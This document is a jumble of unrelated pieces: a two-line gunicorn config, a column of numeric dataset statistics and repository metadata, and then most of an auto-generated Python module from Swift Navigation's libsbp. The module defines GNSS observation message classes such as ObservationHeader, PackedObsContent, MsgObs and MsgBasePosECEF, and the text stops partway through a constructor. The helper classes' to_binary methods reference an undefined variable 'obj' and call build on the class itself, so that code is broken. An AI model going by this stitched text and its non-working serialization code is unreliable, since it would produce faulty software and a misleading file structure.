bind = '127.0.0.1:8001'
workers = 3
| 29
| 56
| 0.737931
| 22
| 145
| 4.863636
| 0.681818
| 0.392523
| 0.317757
| 0.429907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082707
| 0.082759
| 145
| 4
| 57
| 36.25
| 0.721805
| 0
| 0
| 0
| 0
| 0
| 0.648276
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
334de6570d0227b7b5c0139697e035bdca74f29b
| 193,944
|
py
|
Python
|
python/sbp/observation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
python/sbp/observation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
python/sbp/observation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Copyright (C) 2015-2018 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
Satellite observation messages from the device.
"""
import json
import construct
from sbp.msg import SBP, SENDER_ID
from sbp.utils import fmt_repr, exclude_fields, walk_json_dict, containerize
from sbp.gnss import *
# Automatically generated from piksi/yaml/swiftnav/sbp/observation.yaml with generate.py.
# Please do not hand edit!
class ObservationHeader(object):
"""ObservationHeader.
Header of a GNSS observation message.
Parameters
----------
t : GPSTime
GNSS time of this observation
n_obs : int
Total number of observations. First nibble is the size
of the sequence (n), second nibble is the zero-indexed
counter (ith packet of n)
"""
_parser = construct.Embedded(construct.Struct(
't' / construct.Struct(GPSTime._parser),
'n_obs' / construct.Int8ul,))
__slots__ = [
't',
'n_obs',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.t = kwargs.pop('t')
self.n_obs = kwargs.pop('n_obs')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = ObservationHeader._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return ObservationHeader.build(d)
class Doppler(object):
"""Doppler.
Doppler measurement in Hz represented as a 24-bit
fixed point number with Q16.8 layout, i.e. 16-bits of whole
doppler and 8-bits of fractional doppler. This doppler is defined
as positive for approaching satellites.
Parameters
----------
i : int
Doppler whole Hz
f : int
Doppler fractional part
"""
_parser = construct.Embedded(construct.Struct(
'i' / construct.Int16sl,
'f' / construct.Int8ul,))
__slots__ = [
'i',
'f',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.i = kwargs.pop('i')
self.f = kwargs.pop('f')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = Doppler._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return Doppler.build(d)
class PackedObsContent(object):
"""PackedObsContent.
Pseudorange and carrier phase observation for a satellite being tracked.
The observations are interoperable with 3rd party receivers and conform with
typical RTCM 3.1 message GPS/GLO observations.
Carrier phase observations are not guaranteed to be aligned to the RINEX 3
or RTCM 3.3 MSM reference signal and no 1/4 cycle adjustments are currently
peformed.
Parameters
----------
P : int
Pseudorange observation
L : CarrierPhase
Carrier phase observation with typical sign convention.
D : Doppler
Doppler observation with typical sign convention.
cn0 : int
Carrier-to-Noise density. Zero implies invalid cn0.
lock : int
Lock timer. This value gives an indication of the time
for which a signal has maintained continuous phase lock.
Whenever a signal has lost and regained lock, this
value is reset to zero. It is encoded according to DF402 from
the RTCM 10403.2 Amendment 2 specification. Valid values range
from 0 to 15 and the most significant nibble is reserved for future use.
flags : int
Measurement status flags. A bit field of flags providing the
status of this observation. If this field is 0 it means only the Cn0
estimate for the signal is valid.
sid : GnssSignal
GNSS signal identifier (16 bit)
"""
_parser = construct.Embedded(construct.Struct(
'P' / construct.Int32ul,
'L' / construct.Struct(CarrierPhase._parser),
'D' / construct.Struct(Doppler._parser),
'cn0' / construct.Int8ul,
'lock' / construct.Int8ul,
'flags' / construct.Int8ul,
'sid' / construct.Struct(GnssSignal._parser),))
__slots__ = [
'P',
'L',
'D',
'cn0',
'lock',
'flags',
'sid',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.P = kwargs.pop('P')
self.L = kwargs.pop('L')
self.D = kwargs.pop('D')
self.cn0 = kwargs.pop('cn0')
self.lock = kwargs.pop('lock')
self.flags = kwargs.pop('flags')
self.sid = kwargs.pop('sid')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = PackedObsContent._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return PackedObsContent.build(d)
class PackedOsrContent(object):
"""PackedOsrContent.
Pseudorange and carrier phase network corrections for a satellite signal.
Parameters
----------
P : int
Pseudorange observation
L : CarrierPhase
Carrier phase observation with typical sign convention.
lock : int
Lock timer. This value gives an indication of the time
for which a signal has maintained continuous phase lock.
Whenever a signal has lost and regained lock, this
value is reset to zero. It is encoded according to DF402 from
the RTCM 10403.2 Amendment 2 specification. Valid values range
from 0 to 15 and the most significant nibble is reserved for future use.
flags : int
Correction flags.
sid : GnssSignal
GNSS signal identifier (16 bit)
iono_std : int
Slant ionospheric correction standard deviation
tropo_std : int
Slant tropospheric correction standard deviation
range_std : int
Orbit/clock/bias correction projected on range standard deviation
"""
_parser = construct.Embedded(construct.Struct(
'P' / construct.Int32ul,
'L' / construct.Struct(CarrierPhase._parser),
'lock' / construct.Int8ul,
'flags' / construct.Int8ul,
'sid' / construct.Struct(GnssSignal._parser),
'iono_std' / construct.Int16ul,
'tropo_std' / construct.Int16ul,
'range_std' / construct.Int16ul,))
__slots__ = [
'P',
'L',
'lock',
'flags',
'sid',
'iono_std',
'tropo_std',
'range_std',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.P = kwargs.pop('P')
self.L = kwargs.pop('L')
self.lock = kwargs.pop('lock')
self.flags = kwargs.pop('flags')
self.sid = kwargs.pop('sid')
self.iono_std = kwargs.pop('iono_std')
self.tropo_std = kwargs.pop('tropo_std')
self.range_std = kwargs.pop('range_std')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = PackedOsrContent._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return PackedOsrContent.build(d)
class EphemerisCommonContent(object):
"""EphemerisCommonContent.
Parameters
----------
sid : GnssSignal
GNSS signal identifier (16 bit)
toe : GPSTimeSec
Time of Ephemerides
ura : float
User Range Accuracy
fit_interval : int
Curve fit interval
valid : int
Status of ephemeris, 1 = valid, 0 = invalid
health_bits : int
Satellite health status.
GPS: ICD-GPS-200, chapter 20.3.3.3.1.4
SBAS: 0 = valid, non-zero = invalid
GLO: 0 = valid, non-zero = invalid
"""
_parser = construct.Embedded(construct.Struct(
'sid' / construct.Struct(GnssSignal._parser),
'toe' / construct.Struct(GPSTimeSec._parser),
'ura' / construct.Float32l,
'fit_interval' / construct.Int32ul,
'valid' / construct.Int8ul,
'health_bits' / construct.Int8ul,))
__slots__ = [
'sid',
'toe',
'ura',
'fit_interval',
'valid',
'health_bits',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.sid = kwargs.pop('sid')
self.toe = kwargs.pop('toe')
self.ura = kwargs.pop('ura')
self.fit_interval = kwargs.pop('fit_interval')
self.valid = kwargs.pop('valid')
self.health_bits = kwargs.pop('health_bits')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = EphemerisCommonContent._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return EphemerisCommonContent.build(d)
class EphemerisCommonContentDepB(object):
"""EphemerisCommonContentDepB.
Parameters
----------
sid : GnssSignal
GNSS signal identifier (16 bit)
toe : GPSTimeSec
Time of Ephemerides
ura : double
User Range Accuracy
fit_interval : int
Curve fit interval
valid : int
Status of ephemeris, 1 = valid, 0 = invalid
health_bits : int
Satellite health status.
GPS: ICD-GPS-200, chapter 20.3.3.3.1.4
Others: 0 = valid, non-zero = invalid
"""
_parser = construct.Embedded(construct.Struct(
'sid' / construct.Struct(GnssSignal._parser),
'toe' / construct.Struct(GPSTimeSec._parser),
'ura' / construct.Float64l,
'fit_interval' / construct.Int32ul,
'valid' / construct.Int8ul,
'health_bits' / construct.Int8ul,))
__slots__ = [
'sid',
'toe',
'ura',
'fit_interval',
'valid',
'health_bits',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.sid = kwargs.pop('sid')
self.toe = kwargs.pop('toe')
self.ura = kwargs.pop('ura')
self.fit_interval = kwargs.pop('fit_interval')
self.valid = kwargs.pop('valid')
self.health_bits = kwargs.pop('health_bits')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = EphemerisCommonContentDepB._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return EphemerisCommonContentDepB.build(d)
class EphemerisCommonContentDepA(object):
"""EphemerisCommonContentDepA.
Parameters
----------
sid : GnssSignalDep
GNSS signal identifier
toe : GPSTimeDep
Time of Ephemerides
ura : double
User Range Accuracy
fit_interval : int
Curve fit interval
valid : int
Status of ephemeris, 1 = valid, 0 = invalid
health_bits : int
Satellite health status.
GPS: ICD-GPS-200, chapter 20.3.3.3.1.4
SBAS: 0 = valid, non-zero = invalid
GLO: 0 = valid, non-zero = invalid
"""
_parser = construct.Embedded(construct.Struct(
'sid' / construct.Struct(GnssSignalDep._parser),
'toe' / construct.Struct(GPSTimeDep._parser),
'ura' / construct.Float64l,
'fit_interval' / construct.Int32ul,
'valid' / construct.Int8ul,
'health_bits' / construct.Int8ul,))
__slots__ = [
'sid',
'toe',
'ura',
'fit_interval',
'valid',
'health_bits',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.sid = kwargs.pop('sid')
self.toe = kwargs.pop('toe')
self.ura = kwargs.pop('ura')
self.fit_interval = kwargs.pop('fit_interval')
self.valid = kwargs.pop('valid')
self.health_bits = kwargs.pop('health_bits')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = EphemerisCommonContentDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return EphemerisCommonContentDepA.build(d)
class ObservationHeaderDep(object):
"""ObservationHeaderDep.
Header of a GPS observation message.
Parameters
----------
t : GPSTimeDep
GPS time of this observation
n_obs : int
Total number of observations. First nibble is the size
of the sequence (n), second nibble is the zero-indexed
counter (ith packet of n)
"""
_parser = construct.Embedded(construct.Struct(
't' / construct.Struct(GPSTimeDep._parser),
'n_obs' / construct.Int8ul,))
__slots__ = [
't',
'n_obs',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.t = kwargs.pop('t')
self.n_obs = kwargs.pop('n_obs')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = ObservationHeaderDep._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return ObservationHeaderDep.build(d)
class CarrierPhaseDepA(object):
"""CarrierPhaseDepA.
Carrier phase measurement in cycles represented as a 40-bit
fixed point number with Q32.8 layout, i.e. 32-bits of whole
cycles and 8-bits of fractional cycles. This has the opposite
sign convention than a typical GPS receiver and the phase has
the opposite sign as the pseudorange.
Parameters
----------
i : int
Carrier phase whole cycles
f : int
Carrier phase fractional part
"""
_parser = construct.Embedded(construct.Struct(
'i' / construct.Int32sl,
'f' / construct.Int8ul,))
__slots__ = [
'i',
'f',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.i = kwargs.pop('i')
self.f = kwargs.pop('f')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = CarrierPhaseDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return CarrierPhaseDepA.build(d)
class PackedObsContentDepA(object):
"""PackedObsContentDepA.
Deprecated.
Parameters
----------
P : int
Pseudorange observation
L : CarrierPhaseDepA
Carrier phase observation with opposite sign from typical convention
cn0 : int
Carrier-to-Noise density
lock : int
Lock indicator. This value changes whenever a satellite
signal has lost and regained lock, indicating that the
carrier phase ambiguity may have changed.
prn : int
PRN-1 identifier of the satellite signal
"""
_parser = construct.Embedded(construct.Struct(
'P' / construct.Int32ul,
'L' / construct.Struct(CarrierPhaseDepA._parser),
'cn0' / construct.Int8ul,
'lock' / construct.Int16ul,
'prn' / construct.Int8ul,))
__slots__ = [
'P',
'L',
'cn0',
'lock',
'prn',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.P = kwargs.pop('P')
self.L = kwargs.pop('L')
self.cn0 = kwargs.pop('cn0')
self.lock = kwargs.pop('lock')
self.prn = kwargs.pop('prn')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = PackedObsContentDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return PackedObsContentDepA.build(d)
class PackedObsContentDepB(object):
"""PackedObsContentDepB.
Pseudorange and carrier phase observation for a satellite being
tracked. Pseudoranges are referenced to a nominal pseudorange.
Parameters
----------
P : int
Pseudorange observation
L : CarrierPhaseDepA
Carrier phase observation with opposite sign from typical convention.
cn0 : int
Carrier-to-Noise density
lock : int
Lock indicator. This value changes whenever a satellite
signal has lost and regained lock, indicating that the
carrier phase ambiguity may have changed.
sid : GnssSignalDep
GNSS signal identifier
"""
_parser = construct.Embedded(construct.Struct(
'P' / construct.Int32ul,
'L' / construct.Struct(CarrierPhaseDepA._parser),
'cn0' / construct.Int8ul,
'lock' / construct.Int16ul,
'sid' / construct.Struct(GnssSignalDep._parser),))
__slots__ = [
'P',
'L',
'cn0',
'lock',
'sid',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.P = kwargs.pop('P')
self.L = kwargs.pop('L')
self.cn0 = kwargs.pop('cn0')
self.lock = kwargs.pop('lock')
self.sid = kwargs.pop('sid')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = PackedObsContentDepB._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return PackedObsContentDepB.build(d)
class PackedObsContentDepC(object):
"""PackedObsContentDepC.
Pseudorange and carrier phase observation for a satellite being
tracked. The observations are be interoperable with 3rd party
receivers and conform with typical RTCMv3 GNSS observations.
Parameters
----------
P : int
Pseudorange observation
L : CarrierPhase
Carrier phase observation with typical sign convention.
cn0 : int
Carrier-to-Noise density
lock : int
Lock indicator. This value changes whenever a satellite
signal has lost and regained lock, indicating that the
carrier phase ambiguity may have changed.
sid : GnssSignalDep
GNSS signal identifier
"""
_parser = construct.Embedded(construct.Struct(
'P' / construct.Int32ul,
'L' / construct.Struct(CarrierPhase._parser),
'cn0' / construct.Int8ul,
'lock' / construct.Int16ul,
'sid' / construct.Struct(GnssSignalDep._parser),))
__slots__ = [
'P',
'L',
'cn0',
'lock',
'sid',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.P = kwargs.pop('P')
self.L = kwargs.pop('L')
self.cn0 = kwargs.pop('cn0')
self.lock = kwargs.pop('lock')
self.sid = kwargs.pop('sid')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = PackedObsContentDepC._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return PackedObsContentDepC.build(d)
class GnssCapb(object):
"""GnssCapb.
Parameters
----------
gps_active : int
GPS SV active mask
gps_l2c : int
GPS L2C active mask
gps_l5 : int
GPS L5 active mask
glo_active : int
GLO active mask
glo_l2of : int
GLO L2OF active mask
glo_l3 : int
GLO L3 active mask
sbas_active : int
SBAS active mask (PRNs 120..158, AN 7/62.2.2-18/18 Table B-23,
https://www.caat.or.th/wp-content/uploads/2018/03/SL-2018.18.E-1.pdf)
sbas_l5 : int
SBAS L5 active mask (PRNs 120..158, AN 7/62.2.2-18/18 Table B-23,
https://www.caat.or.th/wp-content/uploads/2018/03/SL-2018.18.E-1.pdf)
bds_active : int
BDS active mask
bds_d2nav : int
BDS D2NAV active mask
bds_b2 : int
BDS B2 active mask
bds_b2a : int
BDS B2A active mask
qzss_active : int
QZSS active mask
gal_active : int
GAL active mask
gal_e5 : int
GAL E5 active mask
"""
_parser = construct.Embedded(construct.Struct(
'gps_active' / construct.Int64ul,
'gps_l2c' / construct.Int64ul,
'gps_l5' / construct.Int64ul,
'glo_active' / construct.Int32ul,
'glo_l2of' / construct.Int32ul,
'glo_l3' / construct.Int32ul,
'sbas_active' / construct.Int64ul,
'sbas_l5' / construct.Int64ul,
'bds_active' / construct.Int64ul,
'bds_d2nav' / construct.Int64ul,
'bds_b2' / construct.Int64ul,
'bds_b2a' / construct.Int64ul,
'qzss_active' / construct.Int32ul,
'gal_active' / construct.Int64ul,
'gal_e5' / construct.Int64ul,))
__slots__ = [
'gps_active',
'gps_l2c',
'gps_l5',
'glo_active',
'glo_l2of',
'glo_l3',
'sbas_active',
'sbas_l5',
'bds_active',
'bds_d2nav',
'bds_b2',
'bds_b2a',
'qzss_active',
'gal_active',
'gal_e5',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.gps_active = kwargs.pop('gps_active')
self.gps_l2c = kwargs.pop('gps_l2c')
self.gps_l5 = kwargs.pop('gps_l5')
self.glo_active = kwargs.pop('glo_active')
self.glo_l2of = kwargs.pop('glo_l2of')
self.glo_l3 = kwargs.pop('glo_l3')
self.sbas_active = kwargs.pop('sbas_active')
self.sbas_l5 = kwargs.pop('sbas_l5')
self.bds_active = kwargs.pop('bds_active')
self.bds_d2nav = kwargs.pop('bds_d2nav')
self.bds_b2 = kwargs.pop('bds_b2')
self.bds_b2a = kwargs.pop('bds_b2a')
self.qzss_active = kwargs.pop('qzss_active')
self.gal_active = kwargs.pop('gal_active')
self.gal_e5 = kwargs.pop('gal_e5')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = GnssCapb._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return GnssCapb.build(d)
class AlmanacCommonContent(object):
"""AlmanacCommonContent.
Parameters
----------
sid : GnssSignal
GNSS signal identifier
toa : GPSTimeSec
Reference time of almanac
ura : double
User Range Accuracy
fit_interval : int
Curve fit interval
valid : int
Status of almanac, 1 = valid, 0 = invalid
health_bits : int
Satellite health status for GPS:
- bits 5-7: NAV data health status. See IS-GPS-200H
Table 20-VII: NAV Data Health Indications.
- bits 0-4: Signal health status. See IS-GPS-200H
Table 20-VIII. Codes for Health of SV Signal
Components.
Satellite health status for GLO:
See GLO ICD 5.1 table 5.1 for details
- bit 0: C(n), "unhealthy" flag that is transmitted within
non-immediate data and indicates overall constellation status
at the moment of almanac uploading.
'0' indicates malfunction of n-satellite.
'1' indicates that n-satellite is operational.
- bit 1: Bn(ln), '0' indicates the satellite is operational
and suitable for navigation.
"""
_parser = construct.Embedded(construct.Struct(
'sid' / construct.Struct(GnssSignal._parser),
'toa' / construct.Struct(GPSTimeSec._parser),
'ura' / construct.Float64l,
'fit_interval' / construct.Int32ul,
'valid' / construct.Int8ul,
'health_bits' / construct.Int8ul,))
__slots__ = [
'sid',
'toa',
'ura',
'fit_interval',
'valid',
'health_bits',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.sid = kwargs.pop('sid')
self.toa = kwargs.pop('toa')
self.ura = kwargs.pop('ura')
self.fit_interval = kwargs.pop('fit_interval')
self.valid = kwargs.pop('valid')
self.health_bits = kwargs.pop('health_bits')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = AlmanacCommonContent._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return AlmanacCommonContent.build(d)
class AlmanacCommonContentDep(object):
"""AlmanacCommonContentDep.
Parameters
----------
sid : GnssSignalDep
GNSS signal identifier
toa : GPSTimeSec
Reference time of almanac
ura : double
User Range Accuracy
fit_interval : int
Curve fit interval
valid : int
Status of almanac, 1 = valid, 0 = invalid
health_bits : int
Satellite health status for GPS:
- bits 5-7: NAV data health status. See IS-GPS-200H
Table 20-VII: NAV Data Health Indications.
- bits 0-4: Signal health status. See IS-GPS-200H
Table 20-VIII. Codes for Health of SV Signal
Components.
Satellite health status for GLO:
See GLO ICD 5.1 table 5.1 for details
- bit 0: C(n), "unhealthy" flag that is transmitted within
non-immediate data and indicates overall constellation status
at the moment of almanac uploading.
'0' indicates malfunction of n-satellite.
'1' indicates that n-satellite is operational.
- bit 1: Bn(ln), '0' indicates the satellite is operational
and suitable for navigation.
"""
_parser = construct.Embedded(construct.Struct(
'sid' / construct.Struct(GnssSignalDep._parser),
'toa' / construct.Struct(GPSTimeSec._parser),
'ura' / construct.Float64l,
'fit_interval' / construct.Int32ul,
'valid' / construct.Int8ul,
'health_bits' / construct.Int8ul,))
__slots__ = [
'sid',
'toa',
'ura',
'fit_interval',
'valid',
'health_bits',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.sid = kwargs.pop('sid')
self.toa = kwargs.pop('toa')
self.ura = kwargs.pop('ura')
self.fit_interval = kwargs.pop('fit_interval')
self.valid = kwargs.pop('valid')
self.health_bits = kwargs.pop('health_bits')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = AlmanacCommonContentDep._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return AlmanacCommonContentDep.build(d)
class SvAzEl(object):
"""SvAzEl.
Satellite azimuth and elevation.
Parameters
----------
sid : GnssSignal
GNSS signal identifier
az : int
Azimuth angle (range 0..179)
el : int
Elevation angle (range -90..90)
"""
_parser = construct.Embedded(construct.Struct(
'sid' / construct.Struct(GnssSignal._parser),
'az' / construct.Int8ul,
'el' / construct.Int8sl,))
__slots__ = [
'sid',
'az',
'el',
]
def __init__(self, payload=None, **kwargs):
if payload:
self.from_binary(payload)
else:
self.sid = kwargs.pop('sid')
self.az = kwargs.pop('az')
self.el = kwargs.pop('el')
def __repr__(self):
return fmt_repr(self)
def from_binary(self, d):
p = SvAzEl._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
d = dict([(k, getattr(obj, k)) for k in self.__slots__])
return SvAzEl.build(d)
SBP_MSG_OBS = 0x004A
class MsgObs(SBP):
"""SBP class for message MSG_OBS (0x004A).
You can have MSG_OBS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The GPS observations message reports all the raw pseudorange and
carrier phase observations for the satellites being tracked by
the device. Carrier phase observation here is represented as a
40-bit fixed point number with Q32.8 layout (i.e. 32-bits of
whole cycles and 8-bits of fractional cycles). The observations
are be interoperable with 3rd party receivers and conform
with typical RTCMv3 GNSS observations.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
header : ObservationHeader
Header of a GPS observation message
obs : array
Pseudorange and carrier phase observation for a
satellite being tracked.
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'header' / construct.Struct(ObservationHeader._parser),
construct.GreedyRange('obs' / construct.Struct(PackedObsContent._parser)),)
__slots__ = [
'header',
'obs',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgObs,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgObs, self).__init__()
self.msg_type = SBP_MSG_OBS
self.sender = kwargs.pop('sender', SENDER_ID)
self.header = kwargs.pop('header')
self.obs = kwargs.pop('obs')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgObs.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgObs(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgObs._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgObs._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgObs._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgObs, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_BASE_POS_LLH = 0x0044
class MsgBasePosLLH(SBP):
"""SBP class for message MSG_BASE_POS_LLH (0x0044).
You can have MSG_BASE_POS_LLH inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The base station position message is the position reported by
the base station itself. It is used for pseudo-absolute RTK
positioning, and is required to be a high-accuracy surveyed
location of the base station. Any error here will result in an
error in the pseudo-absolute position output.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
lat : double
Latitude
lon : double
Longitude
height : double
Height
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'lat' / construct.Float64l,
'lon' / construct.Float64l,
'height' / construct.Float64l,)
__slots__ = [
'lat',
'lon',
'height',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgBasePosLLH,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgBasePosLLH, self).__init__()
self.msg_type = SBP_MSG_BASE_POS_LLH
self.sender = kwargs.pop('sender', SENDER_ID)
self.lat = kwargs.pop('lat')
self.lon = kwargs.pop('lon')
self.height = kwargs.pop('height')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgBasePosLLH.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgBasePosLLH(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgBasePosLLH._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgBasePosLLH._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgBasePosLLH._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgBasePosLLH, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_BASE_POS_ECEF = 0x0048
class MsgBasePosECEF(SBP):
"""SBP class for message MSG_BASE_POS_ECEF (0x0048).
You can have MSG_BASE_POS_ECEF inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The base station position message is the position reported by
the base station itself in absolute Earth Centered Earth Fixed
coordinates. It is used for pseudo-absolute RTK positioning, and
is required to be a high-accuracy surveyed location of the base
station. Any error here will result in an error in the
pseudo-absolute position output.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
x : double
ECEF X coodinate
y : double
ECEF Y coordinate
z : double
ECEF Z coordinate
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'x' / construct.Float64l,
'y' / construct.Float64l,
'z' / construct.Float64l,)
__slots__ = [
'x',
'y',
'z',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgBasePosECEF,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgBasePosECEF, self).__init__()
self.msg_type = SBP_MSG_BASE_POS_ECEF
